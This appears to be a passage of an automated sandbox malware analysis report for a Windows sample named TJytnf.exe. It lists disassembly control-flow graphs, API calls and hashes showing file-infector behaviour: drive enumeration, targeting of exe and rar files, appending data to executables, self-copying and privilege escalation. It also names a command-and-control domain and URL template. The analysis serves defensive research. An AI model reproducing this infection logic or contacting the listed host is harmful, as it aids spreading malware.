c063fc-c063ff VirtualProtect 275->278 279 c063bc-c063c2 275->279 282 c06205-c06208 276->282 283 c0621b-c06228 276->283 280 c06238-c0623f 277->280 286 c06400-c06416 278->286 279->279 285 c063c4 279->285 280->274 284 c06241 280->284 289 c0622a-c06236 282->289 290 c0620a 282->290 283->280 284->261 285->278 292 c063c6-c063cf 285->292 293 c06420-c06425 286->293 294 c06418-c0641d 286->294 291 c062a2-c062ac 287->291 288->287 289->280 290->280 295 c062b1-c062c8 291->295 296 c062ae 291->296 297 c063d1 292->297 298 c063d4-c063d8 292->298 299 c06373-c06384 295->299 300 c062ce-c062d4 295->300 296->295 297->298 301 c063da 298->301 302 c063dd-c063e1 298->302 299->266 303 c062d6-c062d9 300->303 304 c062da-c062f1 300->304 301->302 305 c063e3 302->305 306 c063e7-c063fa VirtualProtect 302->306 303->304 308 c062f3-c062f9 304->308 309 c06365-c0636e 304->309 305->306 306->275 306->278 310 c06314-c06326 308->310 311 c062fb-c0630f 308->311 309->291 313 c06328-c0634a 310->313 314 c0634c-c06360 310->314 312 c06426-c064a9 311->312 323 c06519-c0651c 312->323 324 c064ab-c064c0 312->324 313->309 314->312 325 c06583-c06587 323->325 326 c0651d-c0651e 323->326 330 c064c2 324->330 331 c06535-c06537 324->331 328 c06588-c0658b 325->328 329 c06522-c06533 326->329 334 c065a1-c065a3 328->334 335 c0658d-c0658f 328->335 329->331 332 c064c5-c064cd 330->332 333 c064f8 330->333 336 c06539 331->336 337 c0659a 331->337 340 c06542-c06545 332->340 341 c064cf-c064d4 332->341 343 c064fa-c064fe 333->343 344 c0656c-c0656f 333->344 345 c06591-c06593 335->345 338 c065b4 336->338 339 c0653b-c06541 336->339 342 c0659b-c0659d 337->342 350 c065be-c065db 338->350 339->340 346 c0654d-c06550 340->346 347 c064d6-c064d9 341->347 348 c06517-c06518 341->348 342->345 349 c0659f 342->349 351 c06500 343->351 352 c06572 343->352 344->352 345->342 353 c06595 345->353 346->350 354 c06552-c06556 346->354 347->346 355 c064db-c064f5 347->355 348->323 349->328 356 c065dd-c065f6 350->356 351->329 357 c06502 351->357 358 c06573-c06576 352->358 353->337 359 c06578-c0657a 354->359 360 c06558-c06569 354->360 355->333 361 c065f7-c06608 356->361 357->358 362 c06504-c06513 357->362 358->359 359->356 363 c0657c 359->363 360->344 362->331 364 c06515 362->364 363->361 365 c0657e-c0657f 363->365 364->348 365->325
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00C060BE
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00C060DF
                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00C06189
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C061A5
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 72155d79c6ad5d815738dc82ae0305a2ebf2ab85d33b910a8a03d61c062566a9
                            • Instruction ID: c63a4e6d1ac66b48e2d723d44e233a3afc32575fdfe35348a20647fdbbb099b1
                            • Opcode Fuzzy Hash: 72155d79c6ad5d815738dc82ae0305a2ebf2ab85d33b910a8a03d61c062566a9
                            • Instruction Fuzzy Hash: A01245B25087858FDB32CF64CC45BEA7BB0EF02310F18459DE8958B2D3D674AA21CB55

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 366 c02b8c-c02bc6 memset GetLogicalDriveStringsA 367 c02bc8-c02bcc 366->367 368 c02c09-c02c28 WaitForMultipleObjects 366->368 371 c02bfa-c02c07 lstrlen 367->371 372 c02bce-c02bd0 367->372 369 c02c2a-c02c3a CreateThread 368->369 370 c02c3c-c02c45 368->370 369->370 371->367 371->368 372->371 373 c02bd2-c02bdc GetDriveTypeA 372->373 373->371 374 c02bde-c02be1 373->374 374->371 375 c02be3-c02bf6 CreateThread 374->375 375->371
                            APIs
                            • memset.MSVCRT ref: 00C02BA6
                            • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00C02BB4
                            • GetDriveTypeA.KERNEL32(?), ref: 00C02BD3
                            • CreateThread.KERNEL32(00000000,00000000,00C02B7D,?,00000000,00000000), ref: 00C02BEE
                            • lstrlen.KERNEL32(?), ref: 00C02BFB
                            • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00C02C16
                            • CreateThread.KERNEL32(00000000,00000000,00C02845,00000000,00000000,00000000), ref: 00C02C3A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                            • String ID:
                            • API String ID: 1073171358-0
                            • Opcode ID: 7fdd4b5ee1736b2636e6cf862a7171b4cf2324aeba77d4227d3d6a6b24bb9b32
                            • Instruction ID: b5d1b33f44d83624218cff78bbccd089db46f5515bc0767d2cf20f8ddabc1020
                            • Opcode Fuzzy Hash: 7fdd4b5ee1736b2636e6cf862a7171b4cf2324aeba77d4227d3d6a6b24bb9b32
                            • Instruction Fuzzy Hash: 6921B7B180019CAFEB309F649C88FAF7B6DFF45348F150125F96692191D7348E06CB61

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 16 c01e6e-c01e95 call c02d60 19 c01e97 call c01d8a 16->19 20 c01e9c-c01eaa call c01df6 16->20 19->20 24 c01eb0-c01ed9 SetFileAttributesA CreateFileA 20->24 25 c02332 20->25 24->25 27 c01edf-c01f28 call c01915 SetFilePointer CreateFileMappingA MapViewOfFile 24->27 26 c02338-c0233b 25->26 28 c02346-c02349 26->28 29 c0233d-c02340 UnmapViewOfFile 26->29 27->25 34 c01f2e-c01f39 27->34 32 c02350-c02354 28->32 33 c0234b-c0234e FindCloseChangeNotification 28->33 29->28 35 c02391-c0239a call c02d9b 32->35 36 c02356-c0235b CloseHandle 32->36 33->32 34->25 37 c01f3f-c01f56 34->37 36->35 37->25 39 c01f5c-c01f64 37->39 39->25 41 c01f6a-c01f70 39->41 41->25 42 c01f76-c01f87 call c01c81 41->42 42->25 45 c01f8d-c01fa7 call c0185b call c01c81 42->45 45->25 50 c01fad-c01fb4 45->50 51 c02024-c02045 50->51 52 c01fb6-c01fc5 call c01af9 50->52 51->25 53 c0204b-c0204e 51->53 52->51 58 c01fc7-c01fd2 52->58 56 c02070-c020f4 call c01af9 * 2 call c01c68 * 2 memset * 2 53->56 57 c02050-c02053 53->57 78 c020f5-c020fe 56->78 60 c02056-c0205a 57->60 58->25 61 c01fd8-c01fe7 58->61 60->56 63 c0205c-c02061 60->63 64 c01fe9-c01fec 61->64 65 c01fef-c02006 call c01af9 61->65 63->25 67 c02067-c0206e 63->67 64->65 73 c02013-c0201e FlushViewOfFile 65->73 74 c02008-c0200e call c01c68 65->74 67->60 73->51 74->73 79 c02130-c02139 78->79 80 c02100-c02114 78->80 83 c0213c-c02142 79->83 81 c02116-c0212a 80->81 82 c0212d-c0212e 80->82 81->82 82->78 84 c02144-c02150 83->84 85 c0215c 83->85 86 c02152-c02154 84->86 87 c02157-c0215a 84->87 88 c0215f-c02162 85->88 86->87 87->83 89 c02181-c02184 88->89 90 c02164-c02171 88->90 93 c02186 89->93 94 c0218d-c021ba call c01c68 89->94 91 c02177-c0217e 90->91 92 c0232a-c0232d 90->92 91->89 92->88 93->94 97 c021d3-c0220b call c01c81 call c01c68 94->97 98 c021bc-c021d0 call c01c68 94->98 105 c0221b-c0221e 97->105 106 c0220d-c02218 call c01c68 97->106 98->97 108 c02220-c02223 105->108 109 c02226-c02328 memcpy UnmapViewOfFile CloseHandle call c01b8a call c0185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call c01915 FindCloseChangeNotification 105->109 106->105 108->109 109->26
                            APIs
                            • SetFileAttributesA.KERNEL32(?,00000080,?,00C032B0,00000164,00C02986,?), ref: 00C01EB9
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00C01ECD
                            • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00C01EF3
                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00C01F07
                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00C01F1D
                            • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00C0201E
                            • memset.MSVCRT ref: 00C020D8
                            • memset.MSVCRT ref: 00C020EA
                            • memcpy.MSVCRT ref: 00C0222D
                            • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C02238
                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C0224A
                            • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C022C6
                            • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C022CB
                            • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C022DD
                            • WriteFile.KERNEL32(000000FF,00C04008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C022F7
                            • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C0230D
                            • FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C02322
                            • UnmapViewOfFile.KERNEL32(?,?,00C032B0,00000164,00C02986,?), ref: 00C02340
                            • FindCloseChangeNotification.KERNEL32(?,?,00C032B0,00000164,00C02986,?), ref: 00C0234E
                            • CloseHandle.KERNEL32(000000FF,?,00C032B0,00000164,00C02986,?), ref: 00C02359
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                            • String ID:
                            • API String ID: 3349749541-0
                            • Opcode ID: 8810fac30741163ac5a60fc1f016209b1381d56683453ac1e8dfbf285bdcc697
                            • Instruction ID: bd611845d56fb6834336e430a8e38553de6f08eff000a06574b2ba33a535b1b7
                            • Opcode Fuzzy Hash: 8810fac30741163ac5a60fc1f016209b1381d56683453ac1e8dfbf285bdcc697
                            • Instruction Fuzzy Hash: D3F17F71900219EFDB24DFA4DC85AAEBBB9FF08314F10452AE919A76A1D730AE41DF50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 117 c01973-c0199a PathFileExistsA 118 c019a0-c019aa 117->118 119 c01ac7-c01acc 117->119 122 c019af-c019c2 CreateFileA 118->122 120 c01ad0-c01ad5 119->120 121 c01ace 119->121 123 c01af0-c01af6 120->123 124 c01ad7-c01ad9 120->124 121->120 125 c019c4-c019d3 Sleep 122->125 126 c01a28-c01a36 GetFileSize 122->126 124->123 125->122 129 c019d5-c01a0b call c0185b wsprintfA CopyFileA 125->129 127 c01a87-c01a8b 126->127 128 c01a38-c01a3b 126->128 131 c01a96-c01a9a 127->131 132 c01a8d-c01a90 FindCloseChangeNotification 127->132 128->127 130 c01a3d-c01a51 VirtualAlloc 128->130 129->126 143 c01a0d-c01a26 CreateFileA 129->143 130->127 134 c01a53-c01a57 130->134 135 c01a9c 131->135 136 c01aad-c01ab1 131->136 132->131 138 c01a80 134->138 139 c01a59-c01a6d ReadFile 134->139 140 c01aa0-c01aa7 DeleteFileA 135->140 141 c01ab3-c01ab6 136->141 142 c01adb-c01ae0 136->142 138->127 139->127 144 c01a6f-c01a7e 139->144 140->136 141->119 147 c01ab8-c01ac1 VirtualFree 141->147 145 c01ae2-c01ae5 142->145 146 c01ae7-c01aec 142->146 143->126 148 c01a9e 143->148 144->138 144->139 145->146 146->123 149 c01aee 146->149 147->119 148->140 149->123
                            APIs
                            • PathFileExistsA.SHLWAPI(00C04E5C,00000000,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C01992
                            • CreateFileA.KERNEL32(00C04E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C019BA
                            • Sleep.KERNEL32(00000064), ref: 00C019C6
                            • wsprintfA.USER32 ref: 00C019EC
                            • CopyFileA.KERNEL32(00C04E5C,?,00000000), ref: 00C01A00
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C01A1E
                            • GetFileSize.KERNEL32(00C04E5C,00000000), ref: 00C01A2C
                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C01A46
                            • ReadFile.KERNEL32(00C04E5C,00C04E60,00000000,?,00000000), ref: 00C01A65
                            • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00C01A90
                            • DeleteFileA.KERNEL32(?), ref: 00C01AA7
                            • VirtualFree.KERNEL32(00C04E60,00000000,00008000), ref: 00C01AC1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                            • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\TJytnf.exe
                            • API String ID: 2523042076-2942807796
                            • Opcode ID: 19f66c9e6a3d77f0a23513840fe292050965b4263be4d89954157050717aec7a
                            • Instruction ID: 301d0a66387a5623ae09192bba573cae843b3296fca53bc2c1edbb5eaec60b3d
                            • Opcode Fuzzy Hash: 19f66c9e6a3d77f0a23513840fe292050965b4263be4d89954157050717aec7a
                            • Instruction Fuzzy Hash: 62514D71A01259EFDF109F98CC84AAEBBBDEB04354F144569F925E61D0D3709F41DBA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 150 c028b8-c028ff memset wsprintfA 151 c02905-c0290d 150->151 152 c029db-c029df 150->152 151->152 153 c02913-c02919 151->153 154 c02956-c02965 strrchr 153->154 155 c0291b-c0294c memset wsprintfA call c029e2 153->155 154->152 157 c02967-c02978 lstrcmpiA 154->157 158 c02951 155->158 159 c02988-c02992 lstrcmpiA 157->159 160 c0297a-c02981 call c01e6e 157->160 158->152 159->152 162 c02994-c0299b 159->162 163 c02986 160->163 164 c029ad-c029c9 strstr 162->164 165 c0299d-c029a3 162->165 163->152 166 c029d3-c029d6 call c02692 164->166 167 c029cb-c029d1 call c0239d 164->167 165->164 168 c029a5-c029a7 lstrcpy 165->168 166->152 167->152 168->164
                            APIs
                            • memset.MSVCRT ref: 00C028D3
                            • wsprintfA.USER32 ref: 00C028F7
                            • memset.MSVCRT ref: 00C02925
                            • wsprintfA.USER32 ref: 00C02940
                              • Part of subcall function 00C029E2: memset.MSVCRT ref: 00C02A02
                              • Part of subcall function 00C029E2: wsprintfA.USER32 ref: 00C02A1A
                              • Part of subcall function 00C029E2: memset.MSVCRT ref: 00C02A44
                              • Part of subcall function 00C029E2: lstrlen.KERNEL32(?), ref: 00C02A54
                              • Part of subcall function 00C029E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00C02A6C
                              • Part of subcall function 00C029E2: strrchr.MSVCRT ref: 00C02A7C
                              • Part of subcall function 00C029E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00C02A9F
                              • Part of subcall function 00C029E2: lstrlen.KERNEL32(Documents and Settings), ref: 00C02AAE
                              • Part of subcall function 00C029E2: memset.MSVCRT ref: 00C02AC6
                              • Part of subcall function 00C029E2: memset.MSVCRT ref: 00C02ADA
                              • Part of subcall function 00C029E2: FindFirstFileA.KERNEL32(?,?), ref: 00C02AEF
                              • Part of subcall function 00C029E2: memset.MSVCRT ref: 00C02B13
                            • strrchr.MSVCRT ref: 00C02959
                            • lstrcmpiA.KERNEL32(00000001,exe), ref: 00C02974
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                            • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                            • API String ID: 3004273771-3007274656
                            • Opcode ID: e031720fd869fa8b2659a9e3a2deb55016344ba9a6f6558b2c36858cc051ae4b
                            • Instruction ID: fb9bbf54cadb7757c091fd0c2b4b5c65362af407799d44b7a87c2bc7293977b4
                            • Opcode Fuzzy Hash: e031720fd869fa8b2659a9e3a2deb55016344ba9a6f6558b2c36858cc051ae4b
                            • Instruction Fuzzy Hash: 5031A272A4035D7BDF20AB65DC8DFDE776CAB14314F050462F595A20C1E6B49BC4DBA0

                            Control-flow Graph

                            APIs
                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00C0164F
                            • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00C0165B
                            • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\TJytnf.exe,00000104), ref: 00C0166E
                            • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 00C016AC
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00C016BD
                              • Part of subcall function 00C0139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C013BC
                              • Part of subcall function 00C0139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00C013DA
                              • Part of subcall function 00C0139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00C01448
                            • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C016E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\TJytnf.exe$C:\Windows\system32$Documents and Settings
                            • API String ID: 123563730-589618872
                            • Opcode ID: b706f63a635ebd8179c4735cc155e642af37dcb9023b2ef1effec5bf0f053b7a
                            • Instruction ID: 3991203e35b2475fa9577a8871750e70bd81a1d744239aea68ffddf422bcaa6a
                            • Opcode Fuzzy Hash: b706f63a635ebd8179c4735cc155e642af37dcb9023b2ef1effec5bf0f053b7a
                            • Instruction Fuzzy Hash: 471108B1502254BBDF2067A5DD4DF9F7E6DEB01365F050025FB09910E0C6718A40D7B1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 205 c01000-c01023 CreateFileA 206 c01092-c01096 205->206 207 c01025-c01055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 c01057-c0105f 207->208 209 c0107b-c01085 207->209 210 c01061-c0106e call c017d0 208->210 211 c01074-c01075 UnmapViewOfFile 208->211 212 c01087-c0108b CloseHandle 209->212 213 c0108d-c01091 CloseHandle 209->213 210->211 211->209 212->213 213->206
                            APIs
                            • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C01018
                            • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C01029
                            • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00C01038
                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C0104B
                            • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C01075
                            • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C0108B
                            • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00C010E8,?), ref: 00C0108E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                            • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                            • API String ID: 1223616889-3273462101
                            • Opcode ID: 6da53ad1c7675ff42b51c9a292524fde19adbf419dbd0b02270a84449819aa5e
                            • Instruction ID: 6c887e93e4944e728470d8f723d3ce50cdec80bbdcbc6c3c7a1a0b83fe4de1b4
                            • Opcode Fuzzy Hash: 6da53ad1c7675ff42b51c9a292524fde19adbf419dbd0b02270a84449819aa5e
                            • Instruction Fuzzy Hash: E80161B150529CBFE7305F609C88F2BBBACDB4479DF054529F695A2090D6705E44CB70

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 376 c02c48-c02c75 memset call c01973 379 c02cb2-c02cb9 376->379 380 c02c77-c02c7f 376->380 383 c02cc8-c02ccc 379->383 384 c02cbb-c02cc2 VirtualFree 379->384 381 c02c81-c02c8b 380->381 382 c02c8f-c02cac CreateThread WaitForMultipleObjects 380->382 381->382 382->379 384->383
                            APIs
                            • memset.MSVCRT ref: 00C02C57
                              • Part of subcall function 00C01973: PathFileExistsA.SHLWAPI(00C04E5C,00000000,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C01992
                              • Part of subcall function 00C01973: CreateFileA.KERNEL32(00C04E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C019BA
                              • Part of subcall function 00C01973: Sleep.KERNEL32(00000064), ref: 00C019C6
                              • Part of subcall function 00C01973: wsprintfA.USER32 ref: 00C019EC
                              • Part of subcall function 00C01973: CopyFileA.KERNEL32(00C04E5C,?,00000000), ref: 00C01A00
                              • Part of subcall function 00C01973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C01A1E
                              • Part of subcall function 00C01973: GetFileSize.KERNEL32(00C04E5C,00000000), ref: 00C01A2C
                              • Part of subcall function 00C01973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C01A46
                              • Part of subcall function 00C01973: ReadFile.KERNEL32(00C04E5C,00C04E60,00000000,?,00000000), ref: 00C01A65
                            • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00C02C99
                            • WaitForMultipleObjects.KERNEL32(00000001,00C016BA,00000001,000000FF,?,00C016BA,00000000), ref: 00C02CAC
                            • VirtualFree.KERNEL32(00A90000,00000000,00008000,C:\Users\user\AppData\Local\Temp\TJytnf.exe,00C04E5C,00C04E60,?,00C016BA,00000000), ref: 00C02CC2
                            Strings
                            • C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C02C69
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                            • String ID: C:\Users\user\AppData\Local\Temp\TJytnf.exe
                            • API String ID: 2042498389-3710522437
                            • Opcode ID: b5f994a8bb4cc12a4bedf3c49048b8e88a936610b13702ccd7f3b41284dcdc8e
                            • Instruction ID: 8cc588dff9b0104a4e0f3d4eb1b763287bf8d71a6d0e50cb58cdb8e73b22274f
                            • Opcode Fuzzy Hash: b5f994a8bb4cc12a4bedf3c49048b8e88a936610b13702ccd7f3b41284dcdc8e
                            • Instruction Fuzzy Hash: BF018FB17412207BE714ABA5EC0EFAFBE6CEF01B60F104124FA25D61C1D6A09A00C7B0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 385 c014e1-c014fb 386 c01541-c01547 385->386 387 c014fd-c01510 GetModuleHandleA 385->387 390 c01573-c01574 call c01638 386->390 391 c01549-c0154c 386->391 388 c01512-c01518 387->388 389 c0151a-c01535 VirtualQuery 387->389 388->386 393 c01537-c01539 389->393 394 c0153b 389->394 397 c01579-c0157a ExitProcess 390->397 395 c01569-c01570 391->395 396 c0154e-c01555 391->396 393->386 393->394 394->386 396->395 398 c01557-c01566 call c01af9 396->398 398->395
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00C01504
                            • VirtualQuery.KERNEL32(00C014E1,?,0000001C), ref: 00C01525
                            • ExitProcess.KERNEL32 ref: 00C0157A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
